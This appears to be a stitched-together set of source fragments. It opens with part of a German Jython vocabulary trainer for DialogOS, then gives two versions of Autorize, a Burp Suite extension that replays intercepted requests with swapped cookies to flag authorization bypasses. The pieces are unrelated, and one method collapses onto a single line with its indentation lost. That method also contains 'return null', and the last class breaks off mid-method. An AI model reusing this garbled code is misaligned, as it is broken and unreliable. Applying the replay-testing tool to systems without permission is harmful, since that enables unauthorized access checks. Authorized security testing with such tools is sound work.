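    elif eingabe == "alle Lektionen auflisten":
        # Build a grammar from the stored lessons that can be asked for
        # and send it back to DialogOS. The feedback window is opened as
        # well.

        def auflisten_in2(ort):
            with open(pfad, "r") as f:
                liste_mit_Lektionen = sorted(line.strip() for line in f)
            ort.setText("".join(lektion + "\n"
                                for lektion in liste_mit_Lektionen))
            ort.setFont(Font("Verdana", Font.BOLD, 15))

        frame_feedback.setVisible(True)
        auflisten_in2(uebersicht2)

        grammatik = "root $NamevonLektion;\n"
        grammatik += "$NamevonLektion = "
        with open(pfad, "r") as f:
            z = 0
            for line in f:
                # Alternatives after the first one are joined with "|".
                trenner = "" if z == 0 else "|"
                if not "_" in line:
                    grammatik += trenner + line
                else:
                    # "name_3" is offered as "name 3".
                    zeile = line.split("_")
                    grammatik += trenner + zeile[0] + " "
                    grammatik += zeile[1].strip()
                if line != "\n":
                    z += 1
        grammatik += ";"
        self.send(grammatik)

    elif "sende" in eingabe:
        # DialogOS names the lesson the user wants to be tested on. The
        # lesson is read from the database and a list of two lists is
        # sent back: the German and the English side of the words not yet
        # known. If every word is already known, a note saying so is sent
        # instead.
        if "nachgeschlagen" in eingabe:
            # "nachgeschlagen 3" arrives as two words; restore the "_".
            bestandteile = eingabe.split()
            name = bestandteile[1] + "_" + bestandteile[2]
        else:
            name = eingabe.split()[1]
        name = checked_table_name(name)

        vokabelliste = stmt.executeQuery(
            "SELECT deutsch, englisch, symbol FROM " + name)
        offen = []
        while vokabelliste.next():
            d = vokabelliste.getString("deutsch")
            e = vokabelliste.getString("englisch")
            if vokabelliste.getString("symbol") == "X":
                offen.append((d, e))
        random.shuffle(offen)

        vokabeln = [[d for d, e in offen], [e for d, e in offen]]
        if vokabeln[0]:
            self.send(vokabeln)
        else:
            self.send([
                "Du kannst diese Lektion schon komplett. Wenn Du sie wieder abgefragt werden willst, resete sie bitte unter Wokabeln verwalten."
            ])

    else:
        # Runs during a test. After each word the feedback window shows
        # the German word, the English word and a symbol telling whether
        # the word was known (O) or not (X).
        nametext = eingabe.split(":")
        name = checked_table_name(nametext[0])
        text = nametext[1]
        feld_feedback.setText(text)

        # The second-to-last line holds the most recent word.
        zeilen = text.split("\n")
        symb = zeilen[-2].split("\t")[-1]
        d = zeilen[-2].split("\t")[-3]
        print(d)

        sql = "UPDATE " + name + " SET symbol = ? WHERE deutsch = ?"
        pstmt = conn.prepareStatement(sql)
        pstmt.setString(1, symb)
        pstmt.setString(2, d)
        pstmt.executeUpdate()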
# Closing part of a call that begins outside this excerpt; kept as found.
size=(1000, 1000))
frame_feedback.setLayout(None)

# Heading above the lesson overview.
uebersichtLabel2 = JLabel()
uebersichtLabel2.setText(
    "<html><font size=+1 color=#191970>vorhandene Lektionen:</font></html>")
uebersichtLabel2.setBounds(450, 200, 250, 50)

# Read-only, scrollable lesson overview.
uebersicht2 = JTextArea()
uebersicht2.editable = False
uebersicht_scroll2 = JScrollPane(uebersicht2)
uebersicht_scroll2.viewport.view = uebersicht2
uebersicht_scroll2.setBounds(450, 250, 250, 410)

# Read-only area for the feedback text.
feld_feedback = JTextArea()
feld_feedback.editable = False
feld_feedback.setBounds(50, 50, 300, 600)

# close2 is defined outside this excerpt.
button_close = JButton('close window', actionPerformed=close2)
button_close.setBounds(50, 650, 300, 30)

# The background image label becomes the content pane, so it has to be set
# before the widgets are added to the frame.
hintergrund2 = ImageIcon("Hintergrund.jpg")
pnl2 = JPanel()
hintergrundlabel2 = JLabel(hintergrund2)
frame_feedback.setContentPane(hintergrundlabel2)
frame_feedback.add(button_close)
frame_feedback.add(uebersicht_scroll2)
frame_feedback.add(uebersichtLabel2)
frame_feedback.add(feld_feedback)
# The window is built hidden here.
frame_feedback.setVisible(False)


class Main(Client):
    # Client subclass whose constructor does nothing; Client.__init__ is
    # not called.
    def __init__(self):
        pass
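class BurpExtender(IBurpExtender, ITab, IHttpListener,
                   IMessageEditorController, AbstractTableModel,
                   IContextMenuFactory):
    """Autorize extension: builds the Burp tab and handles its button events.

    The methods in this excerpt cover UI construction and event handling.
    The HTTP listener, table model and context menu callbacks required by
    the listed interfaces are not part of the excerpt.
    """

    def registerExtenderCallbacks(self, callbacks):
        """Entry point called by Burp: initialise state and build the UI."""
        # keep a reference to our callbacks object
        self._callbacks = callbacks
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()
        # set our extension name
        callbacks.setExtensionName("Autorize")

        # create the log and a lock on which to synchronize when adding log entries
        self._log = ArrayList()
        self._lock = Lock()
        self.intercept = 0

        # Order matters: the configuration tab embeds the three panels
        # built before it, and initTabs embeds the configuration panel.
        self.initInterceptionFilters()
        self.initEnforcementDetector()
        self.initExport()
        self.initConfigurationTab()
        self.initTabs()
        self.initCallbacks()

        print("Thank you for installing Autorize v0.9 extension")
        print("by Barak Tawily")

    def initExport(self):
        """Build the export panel (file type, status filter, Export button)."""
        #
        ## init export tab
        #
        exportLType = JLabel("File Type:")
        exportLType.setBounds(10, 10, 100, 30)

        exportFileTypes = ["HTML"]
        self.exportType = JComboBox(exportFileTypes)
        self.exportType.setBounds(100, 10, 200, 30)

        exportES = [
            "All Statuses", "Authorization bypass!",
            "Authorization enforced??? (please configure enforcement detector)",
            "Authorization enforced!"
        ]
        self.exportES = JComboBox(exportES)
        self.exportES.setBounds(100, 50, 200, 30)

        # The original built an "Enforcement Statuses:" label first and
        # then replaced it with this one before it was ever added.
        exportLES = JLabel("Statuses:")
        exportLES.setBounds(10, 50, 100, 30)

        self.exportButton = JButton("Export",
                                    actionPerformed=self.exportToHTML)
        self.exportButton.setBounds(390, 25, 100, 30)

        self.exportPnl = JPanel()
        self.exportPnl.setLayout(None)
        self.exportPnl.setBounds(0, 0, 1000, 1000)
        self.exportPnl.add(exportLType)
        self.exportPnl.add(self.exportType)
        self.exportPnl.add(exportLES)
        self.exportPnl.add(self.exportES)
        self.exportPnl.add(self.exportButton)

    def initEnforcementDetector(self):
        """Build the enforcement detector panel and its filter list."""
        #
        ## init enforcement detector tab
        #
        self.EDFP = ArrayList()
        self.EDCT = ArrayList()

        EDLType = JLabel("Type:")
        EDLType.setBounds(10, 10, 140, 30)

        EDLContent = JLabel("Content:")
        EDLContent.setBounds(10, 50, 140, 30)

        EDLabelList = JLabel("Filter List:")
        EDLabelList.setBounds(10, 165, 140, 30)

        # addEDFilter keeps only the text before the first ":" of the
        # selected entry.
        EDStrings = [
            "Finger Print: (enforced message body contains)",
            "Content-Length: (constant Content-Length number of enforced response)"
        ]
        self.EDType = JComboBox(EDStrings)
        self.EDType.setBounds(80, 10, 430, 30)

        self.EDText = JTextArea("", 5, 30)
        self.EDText.setBounds(80, 50, 300, 110)

        self.EDModel = DefaultListModel()
        self.EDList = JList(self.EDModel)
        self.EDList.setBounds(80, 175, 300, 110)
        self.EDList.setBorder(LineBorder(Color.BLACK))

        self.EDAdd = JButton("Add filter", actionPerformed=self.addEDFilter)
        self.EDAdd.setBounds(390, 85, 120, 30)
        self.EDDel = JButton("Remove filter", actionPerformed=self.delEDFilter)
        self.EDDel.setBounds(390, 210, 120, 30)

        self.EDPnl = JPanel()
        self.EDPnl.setLayout(None)
        self.EDPnl.setBounds(0, 0, 1000, 1000)
        self.EDPnl.add(EDLType)
        self.EDPnl.add(self.EDType)
        self.EDPnl.add(EDLContent)
        self.EDPnl.add(self.EDText)
        self.EDPnl.add(self.EDAdd)
        self.EDPnl.add(self.EDDel)
        self.EDPnl.add(EDLabelList)
        self.EDPnl.add(self.EDList)

    def initInterceptionFilters(self):
        """Build the interception filters panel and its filter list."""
        #
        ## init interception filters tab
        #
        # addIFFilter keeps only the text before the first ":" of the
        # selected entry.
        IFStrings = [
            "URL Contains: ", "Scope items only: (Content is not required)"
        ]
        self.IFType = JComboBox(IFStrings)
        self.IFType.setBounds(80, 10, 430, 30)

        self.IFModel = DefaultListModel()
        self.IFList = JList(self.IFModel)
        self.IFList.setBounds(80, 175, 300, 110)
        self.IFList.setBorder(LineBorder(Color.BLACK))

        self.IFText = JTextArea("", 5, 30)
        self.IFText.setBounds(80, 50, 300, 110)

        IFLType = JLabel("Type:")
        IFLType.setBounds(10, 10, 140, 30)

        IFLContent = JLabel("Content:")
        IFLContent.setBounds(10, 50, 140, 30)

        IFLabelList = JLabel("Filter List:")
        IFLabelList.setBounds(10, 165, 140, 30)

        self.IFAdd = JButton("Add filter", actionPerformed=self.addIFFilter)
        self.IFAdd.setBounds(390, 85, 120, 30)
        self.IFDel = JButton("Remove filter", actionPerformed=self.delIFFilter)
        self.IFDel.setBounds(390, 210, 120, 30)

        self.filtersPnl = JPanel()
        self.filtersPnl.setLayout(None)
        self.filtersPnl.setBounds(0, 0, 1000, 1000)
        self.filtersPnl.add(IFLType)
        self.filtersPnl.add(self.IFType)
        self.filtersPnl.add(IFLContent)
        self.filtersPnl.add(self.IFText)
        self.filtersPnl.add(self.IFAdd)
        self.filtersPnl.add(self.IFDel)
        self.filtersPnl.add(IFLabelList)
        self.filtersPnl.add(self.IFList)

    def initConfigurationTab(self):
        """Build the configuration panel that hosts the three filter tabs.

        Requires ``self.EDPnl``, ``self.filtersPnl`` and ``self.exportPnl``
        to exist already.
        """
        #
        ## init configuration tab
        #
        self.prevent304 = JCheckBox("Prevent 304 Not Modified status code")
        self.prevent304.setBounds(290, 25, 300, 30)

        self.ignore304 = JCheckBox("Ignore 304/204 status code responses")
        self.ignore304.setBounds(290, 5, 300, 30)
        self.ignore304.setSelected(True)

        self.autoScroll = JCheckBox("Auto Scroll")
        self.autoScroll.setBounds(290, 45, 140, 30)

        startLabel = JLabel("Authorization checks:")
        startLabel.setBounds(10, 10, 140, 30)

        # startOrStop reads this button's text to decide which way to
        # toggle, so the caption doubles as the on/off state.
        self.startButton = JButton("Autorize is off",
                                   actionPerformed=self.startOrStop)
        self.startButton.setBounds(160, 10, 120, 30)
        self.startButton.setBackground(Color(255, 100, 91, 255))

        self.clearButton = JButton("Clear List",
                                   actionPerformed=self.clearList)
        self.clearButton.setBounds(10, 40, 100, 30)

        # Placeholder header text for the tester to overwrite; presumably
        # used for the modified requests - the code that reads it is
        # outside this excerpt.
        self.replaceString = JTextArea("Cookie: Insert=injected; header=here;",
                                       5, 30)
        self.replaceString.setWrapStyleWord(True)
        self.replaceString.setLineWrap(True)
        self.replaceString.setBounds(10, 80, 470, 180)

        self.filtersTabs = JTabbedPane()
        self.filtersTabs.addTab("Enforcement Detector", self.EDPnl)
        self.filtersTabs.addTab("Interception Filters", self.filtersPnl)
        self.filtersTabs.addTab("Export", self.exportPnl)
        self.filtersTabs.setBounds(0, 280, 2000, 700)

        self.pnl = JPanel()
        self.pnl.setBounds(0, 0, 1000, 1000)
        self.pnl.setLayout(None)
        self.pnl.add(self.startButton)
        self.pnl.add(self.clearButton)
        self.pnl.add(self.replaceString)
        self.pnl.add(startLabel)
        self.pnl.add(self.autoScroll)
        self.pnl.add(self.ignore304)
        self.pnl.add(self.prevent304)
        self.pnl.add(self.filtersTabs)

    def initTabs(self):
        """Build the split pane: log table on the left, viewers and configuration on the right."""
        #
        ## init autorize tabs
        #
        # Table, autoScrollListener and copySelectedURL are defined
        # outside this excerpt.
        self.logTable = Table(self)
        self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
        self._splitpane.setResizeWeight(1)
        self.scrollPane = JScrollPane(self.logTable)
        self._splitpane.setLeftComponent(self.scrollPane)
        self.scrollPane.getVerticalScrollBar().addAdjustmentListener(
            autoScrollListener(self))

        copyURLitem = JMenuItem("Copy URL")
        copyURLitem.addActionListener(copySelectedURL(self))
        self.menu = JPopupMenu("Popup")
        self.menu.add(copyURLitem)

        self.tabs = JTabbedPane()
        # Second argument False: the editors are created read-only.
        self._requestViewer = self._callbacks.createMessageEditor(self, False)
        self._responseViewer = self._callbacks.createMessageEditor(self, False)
        self._originalrequestViewer = self._callbacks.createMessageEditor(
            self, False)
        self._originalresponseViewer = self._callbacks.createMessageEditor(
            self, False)

        self.tabs.addTab("Modified Request",
                         self._requestViewer.getComponent())
        self.tabs.addTab("Modified Response",
                         self._responseViewer.getComponent())
        self.tabs.addTab("Original Request",
                         self._originalrequestViewer.getComponent())
        self.tabs.addTab("Original Response",
                         self._originalresponseViewer.getComponent())
        self.tabs.addTab("Configuration", self.pnl)
        # Index 4 is the Configuration tab added last.
        self.tabs.setSelectedIndex(4)
        self._splitpane.setRightComponent(self.tabs)

    def initCallbacks(self):
        """Apply Burp's UI styling, register the context menu and add the tab."""
        #
        ## init callbacks
        #
        # customize our UI components
        self._callbacks.customizeUiComponent(self._splitpane)
        self._callbacks.customizeUiComponent(self.logTable)
        self._callbacks.customizeUiComponent(self.scrollPane)
        self._callbacks.customizeUiComponent(self.tabs)
        self._callbacks.customizeUiComponent(self.filtersTabs)
        self._callbacks.registerContextMenuFactory(self)
        # add the custom tab to Burp's UI
        self._callbacks.addSuiteTab(self)

    #
    ## Events functions
    #
    def startOrStop(self, event):
        """Toggle the extension on or off.

        The HTTP listener is registered only while the extension is on.
        """
        if self.startButton.getText() == "Autorize is off":
            self.startButton.setText("Autorize is on")
            self.startButton.setBackground(Color.GREEN)
            self.intercept = 1
            self._callbacks.registerHttpListener(self)
        else:
            self.startButton.setText("Autorize is off")
            self.startButton.setBackground(Color(255, 100, 91, 255))
            self.intercept = 0
            self._callbacks.removeHttpListener(self)

    def addEDFilter(self, event):
        """Add "<type>: <content>" to the enforcement detector filter list."""
        typeName = self.EDType.getSelectedItem().split(":")[0]
        self.EDModel.addElement(typeName + ": " + self.EDText.getText())

    def delEDFilter(self, event):
        """Remove the selected enforcement detector filter, if any."""
        index = self.EDList.getSelectedIndex()
        if index != -1:
            self.EDModel.remove(index)

    def addIFFilter(self, event):
        """Add "<type>: <content>" to the interception filter list."""
        typeName = self.IFType.getSelectedItem().split(":")[0]
        self.IFModel.addElement(typeName + ": " + self.IFText.getText())

    def delIFFilter(self, event):
        """Remove the selected interception filter, if any."""
        index = self.IFList.getSelectedIndex()
        if index != -1:
            self.IFModel.remove(index)

    def clearList(self, event):
        """Replace the log with an empty list and notify the table."""
        self._lock.acquire()
        try:
            self._log = ArrayList()
            row = self._log.size()
            # NOTE(review): this reports an insertion at row 0 of an empty
            # model; fireTableDataChanged() looks like the matching
            # event - confirm against the Table class.
            self.fireTableRowsInserted(row, row)
        finally:
            # Release the lock even if the table notification raises.
            self._lock.release()

    # exportToHTML runs past the end of this excerpt; its visible start is kept exactly as found.
    def exportToHTML(self, event): parentFrame = JFrame() fileChooser = JFileChooser() fileChooser.setSelectedFile(File("AutorizeReprort.html")) fileChooser.setDialogTitle("Save Autorize Report") userSelection = fileChooser.showSaveDialog(parentFrame) if userSelection == JFileChooser.APPROVE_OPTION: fileToSave = fileChooser.getSelectedFile() enforcementStatusFilter = self.exportES.getSelectedItem() htmlContent = """<html><title>Autorize Report by Barak Tawily</title> <style> .datagrid table { border-collapse: 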
collapse; text-align: left; width: 100%; } .datagrid {font: normal 12px/150% Arial, Helvetica, sans-serif; background: #fff; overflow: hidden; border: 1px solid #006699; -webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; } .datagrid table td, .datagrid table th { padding: 3px 10px; } .datagrid table thead th {background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; color:#FFFFFF; font-size: 15px; font-weight: bold; border-left: 1px solid #0070A8; } .datagrid table thead th:first-child { border: none; }.datagrid table tbody td { color: #00496B; border-left: 1px solid #E1EEF4;font-size: 12px;font-weight: normal; }.datagrid table tbody .alt td { background: #E1EEF4; color: #00496B; }.datagrid table tbody td:first-child { border-left: none; }.datagrid table tbody tr:last-child td { border-bottom: none; }.datagrid table tfoot td div { border-top: 1px solid #006699;background: #E1EEF4;} .datagrid table tfoot td { padding: 0; font-size: 12px } .datagrid table tfoot td div{ padding: 2px; }.datagrid table tfoot td ul { margin: 0; padding:0; list-style: none; text-align: right; }.datagrid table tfoot li { display: inline; }.datagrid table tfoot li a { text-decoration: none; display: inline-block; padding: 2px 8px; margin: 1px;color: #FFFFFF;border: 1px solid #006699;-webkit-border-radius: 3px; -moz-border-radius: 3px; border-radius: 3px; background:-webkit-gradient( linear, left top, left bottom, color-stop(0.05, #006699), color-stop(1, #00557F) );background:-moz-linear-gradient( center top, #006699 5%, #00557F 100% );filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#006699', endColorstr='#00557F');background-color:#006699; }.datagrid table tfoot ul.active, .datagrid table tfoot ul a:hover { 
text-decoration: none;border-color: #006699; color: #FFFFFF; background: none; background-color:#00557F;}div.dhtmlx_window_active, div.dhx_modal_cover_dv { position: fixed !important; } table { width: 100%; table-layout: fixed; } td { border: 1px solid #35f; overflow: hidden; text-overflow: ellipsis; } td.a { width: 13%; white-space: nowrap; } td.b { width: 9%; word-wrap: break-word; } </style> <body> <h1>Autorize Report<h1> <div class="datagrid"><table> <thead><tr><th>URL</th><th>Authorization Enforcement Status</th></tr></thead> <tbody>""" for i in range(0, self._log.size()): color = "" if self._log.get( i )._enfocementStatus == "Authorization enforced??? (please configure enforcement detector)": color = "yellow" if self._log.get(i)._enfocementStatus == "Authorization bypass!": color = "red" if self._log.get(i)._enfocementStatus == "Authorization enforced!": color = "LawnGreen" if enforcementStatusFilter == "All Statuses": htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % ( color, self._log.get(i)._url, self._log.get(i)._url, self._log.get(i)._enfocementStatus) else: if enforcementStatusFilter == self._log.get( i)._enfocementStatus: htmlContent += "<tr bgcolor=\"%s\"><td><a href=\"%s\">%s</a></td><td>%s</td></tr>" % ( color, self._log.get(i)._url, self._log.get(i)._url, self._log.get(i)._enfocementStatus) htmlContent += "</tbody></table></div></body></html>" f = open(fileToSave.getAbsolutePath(), 'w') f.writelines(htmlContent) f.close() # # implement IContextMenuFactory # def createMenuItems(self, invocation): responses = invocation.getSelectedMessages() if responses > 0: ret = LinkedList() requestMenuItem = JMenuItem("Send request to Autorize") cookieMenuItem = JMenuItem("Send cookie to Autorize") requestMenuItem.addActionListener( handleMenuItems(self, responses[0], "request")) cookieMenuItem.addActionListener( handleMenuItems(self, responses[0], "cookie")) ret.add(requestMenuItem) ret.add(cookieMenuItem) return (ret) return 
null # # implement ITab # def getTabCaption(self): return "Autorize" def getUiComponent(self): return self._splitpane # # extend AbstractTableModel # def getRowCount(self): try: return self._log.size() except: return 0 def getColumnCount(self): return 2 def getColumnName(self, columnIndex): if columnIndex == 0: return "URL" if columnIndex == 1: return "Authorization Enforcement Status" return "" def getValueAt(self, rowIndex, columnIndex): logEntry = self._log.get(rowIndex) if columnIndex == 0: return logEntry._url.toString() if columnIndex == 1: return logEntry._enfocementStatus return "" # # implement IMessageEditorController # this allows our request/response viewers to obtain details about the messages being displayed # def getHttpService(self): return self._currentlyDisplayedItem.getHttpService() def getRequest(self): return self._currentlyDisplayedItem.getRequest() def getResponse(self): return self._currentlyDisplayedItem.getResponse() # # implement IHttpListener # def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo): if self.intercept == 1: if self.prevent304.isSelected(): if messageIsRequest: requestHeaders = list( self._helpers.analyzeRequest(messageInfo).getHeaders()) newHeaders = list() found = 0 for header in requestHeaders: if not "If-None-Match:" in header and not "If-Modified-Since:" in header: newHeaders.append(header) found = 1 if found == 1: requestInfo = self._helpers.analyzeRequest(messageInfo) bodyBytes = messageInfo.getRequest()[requestInfo. 
getBodyOffset():] bodyStr = self._helpers.bytesToString(bodyBytes) messageInfo.setRequest( self._helpers.buildHttpMessage( newHeaders, bodyStr)) if not messageIsRequest: if not self.replaceString.getText( ) in self._helpers.analyzeRequest(messageInfo).getHeaders(): if self.ignore304.isSelected(): firstHeader = self._helpers.analyzeResponse( messageInfo.getResponse()).getHeaders()[0] if "304" in firstHeader or "204" in firstHeader: return if self.IFList.getModel().getSize() == 0: self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()).getHeaders()) else: urlString = str( self._helpers.analyzeRequest(messageInfo).getUrl()) for i in range(0, self.IFList.getModel().getSize()): if self.IFList.getModel().getElementAt(i).split( ":")[0] == "Scope items only": currentURL = URL(urlString) if self._callbacks.isInScope(currentURL): self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()). getHeaders()) if self.IFList.getModel().getElementAt(i).split( ":")[0] == "URL Contains": if self.IFList.getModel().getElementAt( i)[14:] in urlString: self.checkAuthorization( messageInfo, self._helpers.analyzeResponse( messageInfo.getResponse()). 
getHeaders()) return def makeRequest(self, messageInfo, message): requestURL = self._helpers.analyzeRequest(messageInfo).getUrl() return self._callbacks.makeHttpRequest( self._helpers.buildHttpService( str(requestURL.getHost()), int(requestURL.getPort()), requestURL.getProtocol() == "https"), message) def makeMessage(self, messageInfo, removeOrNot): requestInfo = self._helpers.analyzeRequest(messageInfo) headers = requestInfo.getHeaders() if removeOrNot: headers = list(headers) removeHeaders = ArrayList() removeHeaders.add(self.replaceString.getText() [0:self.replaceString.getText().index(":")]) for header in headers[:]: for removeHeader in removeHeaders: if removeHeader in header: headers.remove(header) headers.append(self.replaceString.getText()) msgBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] return self._helpers.buildHttpMessage(headers, msgBody) def checkAuthorization(self, messageInfo, originalHeaders): message = self.makeMessage(messageInfo, True) requestResponse = self.makeRequest(messageInfo, message) analyzedResponse = self._helpers.analyzeResponse( requestResponse.getResponse()) oldStatusCode = originalHeaders[0] newStatusCode = analyzedResponse.getHeaders()[0] oldContentLen = self.getContentLength(originalHeaders) newContentLen = self.getContentLength(analyzedResponse.getHeaders()) impression = "" EDFilters = self.EDModel.toArray() if oldStatusCode == newStatusCode: if oldContentLen == newContentLen: impression = "Authorization bypass!" else: impression = "Authorization enforced??? (please configure enforcement detector)" for filter in EDFilters: if str(filter).startswith("Content-Length: "): if newContentLen == filter: impression = "Authorization enforced!" if str(filter).startswith("Finger Print: "): if filter[14:] in self._helpers.bytesToString( requestResponse.getResponse() [analyzedResponse.getBodyOffset():]): impression = "Authorization enforced!" else: impression = "Authorization enforced!" 
self._lock.acquire() row = self._log.size() self._log.add( LogEntry(self._callbacks.saveBuffersToTempFiles(requestResponse), self._helpers.analyzeRequest(requestResponse).getUrl(), messageInfo, impression)) # same requests not include again. self.fireTableRowsInserted(row, row) self._lock.release() def getContentLength(self, analyzedResponseHeaders): for header in analyzedResponseHeaders: if "Content-Length:" in header: return header return "null" def getCookieFromMessage(self, messageInfo): headers = list( self._helpers.analyzeRequest( messageInfo.getRequest()).getHeaders()) for header in headers: if "Cookie:" in header: return header return None
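class BurpExtender(IBurpExtender, ITab, IHttpListener, IMessageEditorController, AbstractTableModel, IContextMenuFactory):
    """Burp extension entry point for Autorize.

    The class builds the configuration UI, acts as the table model for the
    result log and exports that log as HTML or tab-separated text.
    """

    def registerExtenderCallbacks(self, callbacks):
        """Store the Burp callbacks, create the shared state and build the UI."""
        # keep a reference to our callbacks object
        self._callbacks = callbacks
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()
        # set our extension name
        callbacks.setExtensionName("Autorize")

        # create the log and a lock on which to synchronize when adding log entries
        self._log = ArrayList()
        self._lock = Lock()
        self._enfocementStatuses = ["Authorization bypass!","Authorization enforced??? (please configure enforcement detector)","Authorization enforced!"]
        self.intercept = 0

        self.initInterceptionFilters()
        self.initEnforcementDetector()
        self.initEnforcementDetectorUnauthorized()
        self.initExport()
        self.initConfigurationTab()
        self.initTabs()
        self.initCallbacks()

        self.currentRequestNumber = 1

        print "Thank you for installing Autorize v0.12 extension"
        print "Created by Barak Tawily"
        print "Contributors: Barak Tawily, Federico Dotta"
        print "\nGithub:\nhttps://github.com/Quitten/Autorize"
        return

    def initExport(self):
        """Build the export panel: file type, status filter and export button."""
        #
        ## init enforcement detector tab
        #
        exportLType = JLabel("File Type:")
        exportLType.setBounds(10, 10, 100, 30)

        exportFileTypes = ["HTML","CSV"]
        self.exportType = JComboBox(exportFileTypes)
        self.exportType.setBounds(100, 10, 200, 30)

        exportES = ["All Statuses", self._enfocementStatuses[0], self._enfocementStatuses[1], self._enfocementStatuses[2]]
        self.exportES = JComboBox(exportES)
        self.exportES.setBounds(100, 50, 200, 30)

        # Only this label was ever added to the panel; an earlier label bound
        # to the same name was overwritten before use and is not created.
        exportLES = JLabel("Statuses:")
        exportLES.setBounds(10, 50, 100, 30)

        self.exportButton = JButton("Export",actionPerformed=self.export)
        self.exportButton.setBounds(390, 25, 100, 30)

        self.exportPnl = JPanel()
        self.exportPnl.setLayout(None)
        self.exportPnl.setBounds(0, 0, 1000, 1000)
        self.exportPnl.add(exportLType)
        self.exportPnl.add(self.exportType)
        self.exportPnl.add(exportLES)
        self.exportPnl.add(self.exportES)
        self.exportPnl.add(self.exportButton)

    def initEnforcementDetector(self):
        """Build the enforcement-detector filter panel."""
        #
        ## init enforcement detector tab
        #

        # These two variable appears to be unused...
        self.EDFP = ArrayList()
        self.EDCT = ArrayList()

        EDLType = JLabel("Type:")
        EDLType.setBounds(10, 10, 140, 30)

        EDLContent = JLabel("Content:")
        EDLContent.setBounds(10, 50, 140, 30)

        EDLabelList = JLabel("Filter List:")
        EDLabelList.setBounds(10, 165, 140, 30)

        EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"]
        self.EDType = JComboBox(EDStrings)
        self.EDType.setBounds(80, 10, 430, 30)

        self.EDText = JTextArea("", 5, 30)
        self.EDText.setBounds(80, 50, 300, 110)

        self.EDModel = DefaultListModel()
        self.EDList = JList(self.EDModel)
        self.EDList.setBounds(80, 175, 300, 110)
        self.EDList.setBorder(LineBorder(Color.BLACK))

        self.EDAdd = JButton("Add filter",actionPerformed=self.addEDFilter)
        self.EDAdd.setBounds(390, 85, 120, 30)
        self.EDDel = JButton("Remove filter",actionPerformed=self.delEDFilter)
        self.EDDel.setBounds(390, 210, 120, 30)

        self.EDPnl = JPanel()
        self.EDPnl.setLayout(None)
        self.EDPnl.setBounds(0, 0, 1000, 1000)
        self.EDPnl.add(EDLType)
        self.EDPnl.add(self.EDType)
        self.EDPnl.add(EDLContent)
        self.EDPnl.add(self.EDText)
        self.EDPnl.add(self.EDAdd)
        self.EDPnl.add(self.EDDel)
        self.EDPnl.add(EDLabelList)
        self.EDPnl.add(self.EDList)

    def initEnforcementDetectorUnauthorized(self):
        """Build the filter panel used for the unauthenticated check."""
        #
        ## init enforcement detector tab
        #
        EDLType = JLabel("Type:")
        EDLType.setBounds(10, 10, 140, 30)

        EDLContent = JLabel("Content:")
        EDLContent.setBounds(10, 50, 140, 30)

        EDLabelList = JLabel("Filter List:")
        EDLabelList.setBounds(10, 165, 140, 30)

        EDStrings = ["Headers (simple string): (enforced message headers contains)", "Headers (regex): (enforced messege headers contains)", "Body (simple string): (enforced messege body contains)", "Body (regex): (enforced messege body contains)", "Full request (simple string): (enforced messege contains)", "Full request (regex): (enforced messege contains)", "Content-Length: (constant Content-Length number of enforced response)"]
        self.EDTypeUnauth = JComboBox(EDStrings)
        self.EDTypeUnauth.setBounds(80, 10, 430, 30)

        self.EDTextUnauth = JTextArea("", 5, 30)
        self.EDTextUnauth.setBounds(80, 50, 300, 110)

        self.EDModelUnauth = DefaultListModel()
        self.EDListUnauth = JList(self.EDModelUnauth)
        self.EDListUnauth.setBounds(80, 175, 300, 110)
        self.EDListUnauth.setBorder(LineBorder(Color.BLACK))

        self.EDAddUnauth = JButton("Add filter",actionPerformed=self.addEDFilterUnauth)
        self.EDAddUnauth.setBounds(390, 85, 120, 30)
        self.EDDelUnauth = JButton("Remove filter",actionPerformed=self.delEDFilterUnauth)
        self.EDDelUnauth.setBounds(390, 210, 120, 30)

        self.EDPnlUnauth = JPanel()
        self.EDPnlUnauth.setLayout(None)
        self.EDPnlUnauth.setBounds(0, 0, 1000, 1000)
        self.EDPnlUnauth.add(EDLType)
        self.EDPnlUnauth.add(self.EDTypeUnauth)
        self.EDPnlUnauth.add(EDLContent)
        self.EDPnlUnauth.add(self.EDTextUnauth)
        self.EDPnlUnauth.add(self.EDAddUnauth)
        self.EDPnlUnauth.add(self.EDDelUnauth)
        self.EDPnlUnauth.add(EDLabelList)
        self.EDPnlUnauth.add(self.EDListUnauth)

    def initInterceptionFilters(self):
        """Build the interception-filter panel."""
        #
        ## init interception filters tab
        #
        IFStrings = ["Scope items only: (Content is not required)","URL Contains (simple string): ","URL Contains (regex): ","URL Not Contains (simple string): ","URL Not Contains (regex): "]
        self.IFType = JComboBox(IFStrings)
        self.IFType.setBounds(80, 10, 430, 30)

        self.IFModel = DefaultListModel()
        self.IFList = JList(self.IFModel)
        self.IFList.setBounds(80, 175, 300, 110)
        self.IFList.setBorder(LineBorder(Color.BLACK))

        self.IFText = JTextArea("", 5, 30)
        self.IFText.setBounds(80, 50, 300, 110)

        IFLType = JLabel("Type:")
        IFLType.setBounds(10, 10, 140, 30)

        IFLContent = JLabel("Content:")
        IFLContent.setBounds(10, 50, 140, 30)

        IFLabelList = JLabel("Filter List:")
        IFLabelList.setBounds(10, 165, 140, 30)

        self.IFAdd = JButton("Add filter",actionPerformed=self.addIFFilter)
        self.IFAdd.setBounds(390, 85, 120, 30)
        self.IFDel = JButton("Remove filter",actionPerformed=self.delIFFilter)
        self.IFDel.setBounds(390, 210, 120, 30)

        self.filtersPnl = JPanel()
        self.filtersPnl.setLayout(None)
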